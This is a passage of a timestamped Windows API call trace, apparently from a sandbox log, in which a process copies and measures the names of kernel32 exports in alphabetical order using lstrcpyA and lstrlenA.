returned="ApplicationRecoveryFinished" [0084.334] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.334] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.334] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.334] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.334] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.334] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.334] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.334] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.334] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.334] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.334] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.334] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.334] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.334] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.334] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.334] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.334] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.335] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.335] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.335] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.335] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.335] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.335] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.335] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.335] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.335] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.335] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.335] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.335] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.335] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.335] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.335] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.335] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.335] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.335] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.335] lstrlenA (lpString="BEEP") returned 4 [0084.335] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.336] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0084.336] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0084.336] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0084.336] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0084.336] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0084.336] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0084.336] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0084.336] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0084.336] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0084.336] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0084.336] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0084.336] lstrlenA (lpString="CANCELIO") returned 8 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0084.336] lstrlenA (lpString="CANCELIOEX") returned 10 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0084.336] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0084.336] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0084.336] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0084.336] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0084.336] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0084.336] lstrlenA (lpString="CHECKELEVATION") returned 14 [0084.336] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0084.336] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0084.337] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0084.337] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0084.337] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0084.337] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0084.337] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0084.337] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0084.337] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0084.337] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0084.337] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0084.337] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0084.337] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.337] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.337] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.337] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.338] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.338] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.338] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.338] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.338] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.338] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.338] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.338] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.338] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.338] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.338] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.338] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.338] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.338] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.338] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.338] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.338] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.338] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.338] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.338] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.339] lstrlenA (lpString="COPYFILEA") returned 9 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.339] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.339] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.339] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.339] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.339] lstrlenA (lpString="COPYFILEW") returned 9 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.339] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.339] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.339] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.339] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.339] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.339] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.339] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.339] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.339] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.339] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.339] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.339] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.339] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.340] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.340] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.340] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.340] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.340] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.340] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.340] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.340] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.340] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.340] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.340] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.340] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.340] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.340] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.340] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.340] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") 